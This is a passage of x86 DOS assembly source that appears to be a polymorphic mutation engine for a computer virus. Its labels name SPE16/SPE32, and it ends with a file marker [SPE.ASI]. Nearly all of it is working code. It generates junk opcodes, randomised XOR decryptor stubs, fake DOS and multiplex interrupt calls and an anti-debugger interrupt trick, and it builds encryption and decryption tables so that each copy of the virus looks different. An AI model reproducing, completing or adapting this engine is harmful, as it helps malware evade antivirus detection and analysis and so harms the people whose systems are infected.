CALL MOV_AX PUSH -1 PUSH CMP_JE_AL JMP GEN_INT21 ;-------------------------------------- ;MOV AX,4A04H/1612H ;INT 2FH ;AND AX,AX ;JE @@OK ;RETN ;@@OK: ;PUSH CS ;POP ES TRICK_18 = $-START MOV CX,4A04H JMP INT2F_ES TRICK_19 = $-START MOV CX,1612H INT2F_ES: CALL MOV_INT2F CALL CMP_JE_AX JMP RESTORE_ES ;-------------------------------------- VIA_INT21_0 = $-START XOR CH,CH GEN_INT21_1: CALL MOV_AH JMP GEN_INT21 ;-------------------------------------- VIA_INT21_4C = $-START MOV CH,4CH JMP GEN_INT21_1 ;-------------------------------------- ;ENTRY: CL=CHECK NUMBER/BH=JAE/JBE CMP_JXX_AL: XOR CH,CH MOV BL,CH ;AX CALL DX JE CHECK_REG XOR BH,4 ;JA/JB TEST BH,AL JNE IS_JA INC CX CMP AL,12H ORG $-1 IS_JA: DEC CX ;-------------------------------------- ;ENTRY: BL=REG NUMBER ; BH=JXX CODE (JA/JAE/JB/ETC) ; CX=CHECK NUMBER (IF CX=0 THEN ASSUME THAT REG IS WORD, ; IF CX!=0 THEN ASSUME THAT REG IS AL) ;1. CMP ;2. 
IF CX=0: OR/TEST/AND CHECK_REG: CALL USED_WREG CALL GET_SHIT MOV AL,4 JCXZ GET_METHOD MOV AL,1 GET_METHOD: CALL GET_RAND_BYTE JNE NO_CMP_IMM AND BL,BL JNE IS_NOT_AX CALL DX JNE IS_NOT_AX MOV AL,3DH ;CMP AX JCXZ IS_CMP_WORD DEC AX STOSB JMP STORE_BYTE IS_NOT_AX: MOV AX,0F883H ;CMP REG16,IMM8 OR AH,BL JCXZ IS_CMP_WORD MOV AL,80H ;CMP REG8,IMM8 IS_CMP_WORD: STOSW STORE_BYTE: XCHG AX,CX STOSB JMP GET_JXX NO_CMP_IMM: MOV CX,0C085H ;TEST DEC AX JE STORE_OPCODE MOV CL,21H ;AND DEC AX JE STORE_OPCODE MOV CL,9 ;OR STORE_OPCODE: OR CH,BL SHL BL,3 OR CH,BL XCHG AX,CX STOSW GET_JXX: MOV AL,BH STOSB PUSH DI ;ADDRESS FOR CORRECT JXX STOSB ;------------------------------------- ;GET EXIT CODE: ;1. RETN / RETN XXXX ;2. JMP(CALL) 0 ;3. INT 20H ;4. MOV AX,0/INT 21H ;5. MOV AX,4CXXH/INT 21H MOV SMALL 1 PTR DS:DIRTY_WREG,FREE_WREG CALL GET_SHIT MOV SI,PROC_EXIT MOV AL,SIZE_PROC_EXIT CALL CALL_RANDOM CALL GET_RAND_3 ADD DI,AX POP AX PUSH DI XCHG AX,DI DEC AX SUB AX,DI STOSB POP DI JMP GET_SHIT ;------------------------------------------------ INT_SHIT = $-START CALL DX MOV SI,INT21_AX MOV BH,21H JE FAKE_INT MOV SI,INT2F_AX MOV BH,2FH FAKE_INT: LODSB CALL GET_RAND_BYTE SHL AX,1 ADD SI,AX LODSW PUSH BX CMP AL,0FFH XCHG AX,CX JNE IS_WORD_FN CALL MOV_AH JMP GEN_FAKE_INT IS_WORD_FN: CALL MOV_AX GEN_FAKE_INT: POP BX JMP INT_XX ;-------------------------------------- VIA_INT20 = $-START MOV BH,20H JMP INT_XX ;-------------------------------------- MOV_WIN: MOV CH,16H MOV_INT2F: CALL MOV_AX MOV BH,2FH ;-------------------------------------- ;ENTRY: BH - INT NUMBER ;1. 0CD,XX ;2. ZERO DS(ES)/PUSHF/CALL 4 PTR ES(DS):4*XX ;3. 
only for INT 21H: PUSH CS/MOV AX,50H/CALL AX INT_XX: MOV AL,3 CMP BH,21H JE IS_DOS_SERVICE DEC AX CMP CH,16H JNE IS_DOS_SERVICE DEC AX IS_DOS_SERVICE: CALL GET_RAND_BYTE JNE NO_TRIVIAL MOV BL,0CDH XCHG AX,BX STOSW RETN NO_TRIVIAL: DEC AX JNE FOR_DOS_SRVC ;-------------------------------------- ;1.PUSH 0(0000)/POP SEG ;2.ZERO WREG: ; 2.1 MOV SREG,WREG ; 2.2 PUSH WREG/POP SREG MOV SI,DIRTY_SREG LODSB CMP AL,FREE_SREG JNE IS_ES CALL DX JE IS_ES MOV AL,_DS SHL 3 IS_ES: MOV [SI-1],AL XCHG AX,CX CALL DX JNE VIA_WREG PUSH AX CALL DX SHL AL,1 OR AL,68H STOSB POP AX JP IS_BYTE STOSB IS_BYTE: JMP POP_STACK VIA_WREG: CALL GET_FREE_REG PUSH CX CALL MOV_ZERO16 CALL GET_SHIT CALL UNUSED_WREG CALL DX POP CX JE VIA_STACK MOV AL,8EH ;MOV SREG,WREG STOSB MOV AL,0C0H OR AL,BL JMP END_CLEAR VIA_STACK: MOV AL,50H ;PUSH WREG OR AL,BL POP_STACK: STOSB CALL GET_SHIT MOV AL,7 ;POP SREG END_CLEAR: OR AL,CL STOSB CALL GET_SHIT MOV AL,9CH ;PUSHF STOSB CALL GET_SHIT MOV AL,26H ;ES: (MIN) OR AL,CL STOSB MOV AX,1EFFH ;CALL FAR STOSW MOV AL,BH CBW SHL AX,2 STOSW ;INT ADDRESS CALL GET_SHIT ;-------------------------------------- RESTORE_SREG: CALL PUSH_SREG ;DIRTY_SREG=SEG NUMBER MOV AL,FREE_SREG XCHG AL,SMALL 1 PTR DS:DIRTY_SREG ;SET DIRTY_SREG TO FREE OR AL,7 ;POP SREG STOSB RETN ;-------------------------------------- FOR_DOS_SRVC: MOV CX,50H GEN_PUSH_CALL: CALL PUSH_SREG GEN_CALL: XOR BL,BL ;-------------------------------------- ;ENTRY: BL=0 FOR CALL/1 FOR JMP ; CX=OFFSET GEN_JMPCALL: CALL DX JNE CALL_VIA_WREG MOV AL,0E8H ;CALL NEAR OR AL,BL STOSB MOV AX,DI SUB AX,SMALL ENCRYPT_BUFF-100H-2 SUB AX,CX NEG AX STOSW RETN CALL_VIA_WREG: AND BL,BL PUSHF CALL GET_FREE_REG CALL MOV_WREG POPF MOV AX,0D0FFH ;CALL WREG JE IS_CALL MOV AH,0E0H ;JMP WREG IS_CALL: OR AH,BL STOSW ;-------------------------------------- UNUSED_WREG: PUSH CX MOV CL,BL MOV AL,1 SHL AL,CL XOR SMALL 1 PTR DS:DIRTY_WREG,AL POP CX RETN ;-------------------------------------- PSPCALL_SHIT = $-START MOV CX,52H JMP GEN_PUSH_CALL 
;-------------------------------------- VIA_JMPCALL = $-START CALL DX XCHG AX,BX XOR CX,CX JMP GEN_JMPCALL ;-------------------------------------- MOVREG_SHIT = $-START CALL GET_FREE_REG CALL GET_RAND_WORD XCHG AX,CX CALL MOV_WREG JMP UNUSED_WREG ;-------------------------------------- INCDEC_SHIT = $-START CALL GET_FREE_REG CALL DX SHL AL,3 OR AL,40H ;INC/DEC SET_XCHG: OR AL,BL STOSB JMP UNUSED_WREG ;-------------------------------------- XCHG_SHIT = $-START CALL GET_FREE_REG MOV AL,90H ;XCHG(NOP) JMP SET_XCHG ;-------------------------------------- GET_VALID_SREG: CALL GET_RAND_3 INC AX ;CS,SS,DS SHL AL,3 CMP AL,SMALL 1 PTR DS:DIRTY_SREG JE GET_VALID_SREG RETN ;-------------------------------------- ;EXIT: BL=SOME WREG GET_FREE_REG: PUSH DI MOV DI,WREG_LIST XOR BL,BL MOV AH,[DI-1] ;SMALL 1 PTR DS:DIRTY_WREG XOR AL,AL PUSH DI FILL_WREG_LIST: SHR AH,1 JB NO_VALID_WREG STOSB INC BX NO_VALID_WREG: INC AX CMP AL,8 JNE FILL_WREG_LIST POP DI MOV AL,BL CALL GET_RAND_BYTE ADD DI,AX MOV BL,[DI] POP DI ;-------------------------------------- USED_WREG: PUSH CX MOV CL,BL MOV AL,1 SHL AL,CL OR SMALL 1 PTR DS:DIRTY_WREG,AL POP CX RETN ;-------------------------------------- MOV_ZERO32: DB 66H MOV_ZERO16: XOR CX,CX JMP MOV_WREG MOV_AH: CALL GET_RAND_WORD MOV CL,AL MOV_AX: MOV BL,_AX ;ECX=CONST,BL=REG NUM ;1. PUSH CONST (68/6A)/POP REG ;2. MOV REG,CONST (0B8H OR REG) ;3. 
XOR(SUB/MOV 0) REG/ADD(SUB NEG/OR/XOR) MOV_WREG: CALL GET_RAND_3 NULL_WREG: JNE IS_MOV_IMM MOV AL,68H ;PUSH IMM CALL CHECK_SIGN STOSB MOV EAX,ECX STOSB JNB IS_IMM8 DEC DI CALL STORE32 IS_IMM8: CALL GET_SHIT MOV AL,58H ;POP WREG OR AL,BL STOSB USED_SHIT: CALL USED_WREG JMP GET_SHIT IS_MOV_IMM: DEC AX JNE IS_MOV MOV AL,0B8H ;MOV OR AL,BL STOSB MOV EAX,ECX SAVE_OPCODE: CALL STORE32 SET_USED: JMP USED_SHIT IS_MOV: CALL GET_RAND_3 JNE NO_CALL_MOV PUSH ECX XOR ECX,ECX CALL DX CALL NULL_WREG POP ECX JMP SET_WREG NO_CALL_MOV: DEC AX JE NO_CLEAR_XOR MOV AL,31H-29H ;XOR NO_CLEAR_XOR: ADD AX,1829H ;SUB OR AH,BL SHL AH,3 OR AH,BL XCHG AX,SI CALL DX SHL AL,1 OR AX,SI STOSW CALL USED_SHIT SET_WREG: JECXZ SET_USED CALL GET_RAND_4 PUSH ECX DEC AX MOV AH,0F0H ;XOR JS IS_CASE MOV AH,0C8H ;OR JE IS_CASE MOV AH,0C0H ;ADD DEC AL JE IS_CASE MOV AH,0E8H ;SUB NEG ECX IS_CASE: OR AH,BL MOV AL,81H CALL CHECK_SIGN STOSW XCHG EAX,ECX JB SAVE_CONST STOSB JMP CONST_SAVED SAVE_CONST: CALL STORE32 CONST_SAVED: POP ECX JMP GET_SHIT ;-------------------------------------- CHECK_SIGN: AND BP,BP JE $+3 DB 66H CMP CX,7FH JB SET_EXT_BIT AND BP,BP JE $+3 DB 66H CMP CX,-80H JB NO_SET_BIT SET_EXT_BIT: OR AL,2 NO_SET_BIT: RETN ;-------------------------------------- STORE32: AND BP,BP JE BIT16 DB 66H ;STOSD BIT16: STOSW RETN ;-------------------------------------- GET_SHIT_32: PUSH AX SI CALL GET_RAND_8 JNE NO_SHIT MOV AL,LEN_SIMPLE32 CALL GET_RAND_BYTE ADD AX,SMALL SIMPLE_OP XCHG SI,AX MOVSB NO_SHIT: POP SI AX RETN ;-------------------------------------- GET_SHIT: AND BP,BP JNE GET_SHIT_32 CALL DX JE NO_GET_SHIT MOV SI,SHIT_FLAG CMP AL,[SI] JBE ALL_SHIT TEST AL,[SI+2] ;SMALL 1 PTR DS:DIRTY_WREG MOV AL,SIZE_SHIT JE ALL_SHIT SUB AL,SIZE_LAST_SHIT ALL_SHIT: INC 1 PTR [SI] PUSH BX CX MOV SI,PROC_SHIT CALL CALL_RANDOM POP CX BX DEC SMALL 2 PTR DS:SHIT_FLAG NO_GET_SHIT: RETN ;-------------------------------------- PUSH_SREG: CALL GET_VALID_SREG ADD AL,6 ;PUSH SREG STOSB JMP GET_SHIT 
;-------------------------------------- ONE_SHIT = $-START MOV AL,LEN_SIMPLE_OP CALL GET_RAND_BYTE ADD AX,SMALL SIMPLE_OP XCHG AX,SI MOVSB CMP 1 PTR [DI-1],0CDH JNE NO_INT MOV AL,3FH-34H+1 CALL GET_RAND_BYTE ADD AL,34H STOSB NO_INT: RETN ;-------------------------------------- SMASHTOP_SHIT = $-START CMP SMALL 1 PTR DS:DIRTY_SREG,_DS SHL 3 JNE NO_PREFIX CALL GET_VALID_SREG ADD AL,26H ;ES: STOSB NO_PREFIX: CALL GET_ENCRYPT PUSHF RAND_OFFSET: MOV SI,ENCRYPT_BUFF MOV AX,DI SUB AX,SI CALL GET_RAND ADD SI,AX CMP 1 PTR [SI],'$' JE RAND_OFFSET INC AH STOSW POPF JA WAS_UNARE CALL GET_RAND_BYTE STOSB WAS_UNARE: RETN ;-------------------------------------- VIA_RETN = $-START CALL DX OR AL,0C2H STOSB JP IS_RETN ;IF 0C3H CALL GET_RAND_WORD OR AH,10H ;MIN=1000H STOSW IS_RETN: RETN ;-------------------------------------- AX_SHIT = $-START MOV AL,LEN_AX_OP CALL GET_RAND_BYTE ADD AX,SMALL AX_OP XCHG AX,SI MOVSB RETN ;-------------------------------------- GET_RAND_WORD: XOR AL,AL CMP AX,1234H ORG $-2 ;-------------------------------------- GET_RAND_8: MOV AL,8 CMP AX,1234H ORG $-2 ;-------------------------------------- GET_RAND_4: MOV AL,4 CMP AX,1234H ORG $-2 ;-------------------------------------- GET_RAND_3: MOV AL,3 CMP AX,1234H ORG $-2 ;-------------------------------------- OFF_GET_RAND_2 = $-START GET_RAND_2: MOV AL,2 ;-------------------------------------- GET_RAND_BYTE: XOR AH,AH ;-------------------------------------- ;ENTRY: AX=(LIMIT-1) OR EAX=0 IF INFINITY ;EXIT: AX=RANDOM VALUE, ZF=1 IF ZERO GET_RAND PROC MOVZX EAX,AX PUSH DX EAX MOV EAX,SMALL 4 PTR DS:RANDOMIZE MOV EDX,3A7FDH MUL EDX POP EDX ADD EAX,269EC3H MOV SMALL 4 PTR DS:RANDOMIZE,EAX AND DX,DX JE NO_LIMITED MUL EDX XCHG AX,DX NO_LIMITED: AND AX,AX POP DX RET ENDP ;-------------------------------------- DECRYPTOR = $-START RELO_DECRYPT: MOV AX,1234H FIRST_MASK = $-START-2 MOV CX,OUR_LEN CALL DOS_OFF_CALC DOS_OFF_CALC: POP DI DECRYPT_BYTE: XOR [DI+DECRYPT_DELTA],AX INC DI SUB AX,1234H SECOND_MASK = $-START-2 
LOOP DECRYPT_BYTE DECRYPT_DELTA = $-DOS_OFF_CALC LEN_DECRYPTOR = $-RELO_DECRYPT ;-------------------------------------- ;DATA FOR SPE16 ;IF (LOBYTE)=0FFH THEN IT'S RANDOM INT21_AX = $-START DB LEN21_AX INT21_TBL DW 0BFFH,18FFH,19FFH,20FFH,3303H,3304H,54FFH,5800H,5802H LEN21_AX = ($-INT21_TBL)/2 INT2F_AX = $-START DB LEN2F_AX INT2F_TBL DW 1600H,1686H,4300H DW 100H,500H,600H,1000H,1100H,1400H,1A00H,1B00H,4000H LEN2F_AX = ($-INT2F_TBL)/2 SIMPLE_OP = $-START SIMPLE_TBL: CLC ;<- STC CMC SAHF NOP REPE REPNE SEGES SEGSS SEGDS ;<- USE IN SPE32 LEN_SIMPLE32 = $-SIMPLE_TBL STI CLI CLD STD INTO SEGCS DB 0CDH ;ANTI-TD (INT 34H-3FH) LEN_SIMPLE_OP = $-SIMPLE_TBL AX_OP = $-START AX_TBL: DAA DAS AAA AAS CBW LAHF DB 0D6H ;SETALC XLAT LEN_AX_OP = $-AX_TBL PROC_SHIT = $-START PSHIT_RELO DW ONE_SHIT,SMASHTOP_SHIT,PSPCALL_SHIT,MOVREG_SHIT DW INCDEC_SHIT AXSHIT_RELO DW XCHG_SHIT,AX_SHIT,INT_SHIT ;ALWAYS LAST SIZE_SHIT = ($-PSHIT_RELO)/2 SIZE_LAST_SHIT = ($-AXSHIT_RELO)/2 PROC_EXIT = $-START EXIT_RELO DW VIA_RETN,VIA_JMPCALL,VIA_INT20,VIA_INT21_0,VIA_INT21_4C SIZE_PROC_EXIT = ($-EXIT_RELO)/2 ;-------------------------------------- TRICK_TBL = $-START TRICK_RELO: DW TRICK_1,TRICK_2,TRICK_3,TRICK_4,TRICK_5,TRICK_6,TRICK_7 DW TRICK_8,TRICK_9,TRICK_10,TRICK_11,TRICK_12,TRICK_13 DW TRICK_14,TRICK_15,TRICK_16,TRICK_17,TRICK_18,TRICK_19 SIZE_TRICK_TBL = ($-TRICK_RELO)/2 ;ALSO MAY INCLUDED (WITH SOME CODE CHANGING IN GENERATING VALID SREG AND ;ASSUMES ON ENTRY CHECK_REG SUBROUTINE): ;1. AH=2AH - GET SYSTEM DATE (CHECKING VALID RETURN PARAM) ;2. AH=2CH - GET SYSTEM TIME (AS ABOVE) ;3. AH=2FH - GET DTA (BX=80H/ES RESTORED) ;4. AX=3305H - GET BOOT DRIVE (DL=1...1AH) ;5. AX=3306H - GET TRUE DOS VERSION (BL>=7) ;6. AX=1611H - WIN9X SPECIFIC (AX=0/DS RESTORED) ;7. AX=4A33H - CHECK MS-DOS VER 7 (AS ABOVE) ;8. AX=4B21H - WIN.COM IS ACTIVE? 
(AH=0) ;-------------------------------------- ENCRYPT_TBL = $-START ENCRYPT_RELO: XOR 1 PTR DS:[1234H],12H ORG $-3 ADD 1 PTR DS:[1234H],12H ORG $-3 SUB 1 PTR DS:[1234H],12H ORG $-3 ROL 1 PTR DS:[1234H],2 ORG $-3 ROR 1 PTR DS:[1234H],2 ORG $-3 DEC 1 PTR DS:[1234H] ORG $-2 INC 1 PTR DS:[1234H] ORG $-2 ROL 1 PTR DS:[1234H],1 ORG $-2 ROR 1 PTR DS:[1234H],1 ORG $-2 NOT 1 PTR DS:[1234H] ORG $-2 NEG 1 PTR DS:[1234H] ORG $-2 SIZE_ENCRYPT_TBL = $-ENCRYPT_RELO DECRYPT_TBL: XOR 1 PTR [BX],CL SUB 1 PTR [BX],CL ADD 1 PTR [BX],CL ROR 1 PTR [BX],CL ROL 1 PTR [BX],CL INC 1 PTR [BX] DEC 1 PTR [BX] ROR 1 PTR [BX],1 ROL 1 PTR [BX],1 NOT 1 PTR [BX] NEG 1 PTR [BX] ;-------------------------------------- ;DATA FOR SPE32 INIT_LIST = $-START DB LEN_INIT_LIST INIT_LIST_RELO DW INIT_OFF,INIT_COUNT,INIT_MASK LEN_INIT_LIST = ($-INIT_LIST_RELO)/2 LOOP_LIST = $-START DB LEN_LOOP_LIST LOOP_LIST_RELO DW CHANGE_MASK_REG,MOV_WORK_REG,CHANGE_WORK_REG DW STORE_WORK_REG,CHANGE_OFF_REG LEN_LOOP_LIST = ($-LOOP_LIST_RELO)/2 ;EBX=WORK_REG FOR CRYPTING DW 0CB0FH ;BSWAP EBX (ALWAYS TOP) DW 0DBF7H ;NEG EBX DW 0D3F7H ;NOT EBX DW 0CBD1H ;ROR EBX,1 DW 0C3D1H ;ROL EBX,1 DW 4390H ;INC EBX DW 4B90H ;DEC EBX DW 0CBC1H ;ROR EBX DW 0C3C1H ;ROL EBX DW 0EB81H ;SUB EBX DW 0C381H ;ADD EBX DW 0F381H ;XOR EBX DW 0FBBAH ;BTC (SKIP 0FH) OP32_IMM = $-START OP32_IMM_RELO DW 0F8BAH ;BTC (SKIP 0FH) DW 0F081H ;XOR DW 0E881H ;SUB DW 0C081H ;ADD DW 0C8C1H ;ROR X DW 0C0C1H ;ROL X DW 4090H ;INC (ONE BYTE) DW 4890H ;DEC (ONE BYTE) DW 0C8D1H ;ROR 1 DW 0C0D1H ;ROL 1 DW 0D0F7H ;NOT DW 0D8F7H ;NEG DW 0C80FH ;BSWAP (ALWAYS BOTTOM) LEN_OP32_IMM = ($-OP32_IMM_RELO)/2 OP32_REG = $-START DB 0BH ;OR (09H) OP32_REG_CHG = $-START OP32_REG_CHG_RELO DB 33H ;XOR (31H) DB 03H ;ADD (01H) DB 2BH ;SUB (29H) LEN_OP32_REG_CHG = $-OP32_REG_CHG_RELO ;FOR CRYPTING DB 33H ;XOR DB 2BH ;SUB DB 03H ;ADD ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SPE.ASI]ÄÄÄ